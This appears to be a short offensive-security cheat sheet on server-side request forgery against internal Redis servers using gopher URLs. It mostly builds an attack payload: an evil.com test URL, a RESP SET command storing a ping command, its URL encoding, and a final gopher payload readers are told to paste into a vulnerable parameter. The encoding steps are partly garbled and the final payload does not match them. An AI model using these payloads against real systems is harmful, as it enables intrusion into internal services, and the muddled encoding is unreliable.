Redis SSRF

Investigation

If the target server runs Redis server and the website interacts with the Redis server, we can modify the key value in the Redis and reflects the result through SSRF using gopher.

url=http://evil.com/

Exploitation

Automation

We can use Gopherus to create a payload.

Payload Manually

To make the payload for SSRF manually, we need to know what commands to insert. To make it clear, try to demonstrate the command (RESP format) to update the target key value in Redis. Please see the Redis commands for details.

Below is the example command same as SET user ....

telnet 10.0.0.1 6379
*3 # 3 arguments ("SET", "user", "")
$3 # 3 length of the string "SET"
SET
$4 # 4 length of the string "user" key
user
$18 # 18 length of the string ""
ping+-c+1+10.0.0.2

Then we need to format the above command for the gopher URL. It’s need to be URL encoded conained %0D%0A (\r\n).

gopher://10.0.0.1:6379/_%0D
%0D%0A # \r\n
%2A3 # *3
%0D%0A # \r\n
%243 # $3
%0D%0A # \r\n
SET
%0D%0A # \r\n
%244 # $4
%0D%0A # \r\n
user
%0D%0A # \r\n
%2418 # $18
%0D%0A
ping%2B%2Dc%2B1%2B10%2E0%2E0%2E2 # ping+-c+1+10.0.0.2
%0D%0A

Finally we get the payload.

gopher://10.0.0.1:6379/_%250D%0A%250D%250A%0A%252A3%0A%250D%250A%0A%25243%0A%250D%250A%0ASET%0A%250D%250A%0A%25244%0A%250D%250A%0Auser%0A%250D%250A%0A%252418%0A%250D%250A%0Aping+-c+1+10.0.0.2%0A%250D%250A

Copy it and paste to where the payload affects the result.

References

• InfoSec Writeups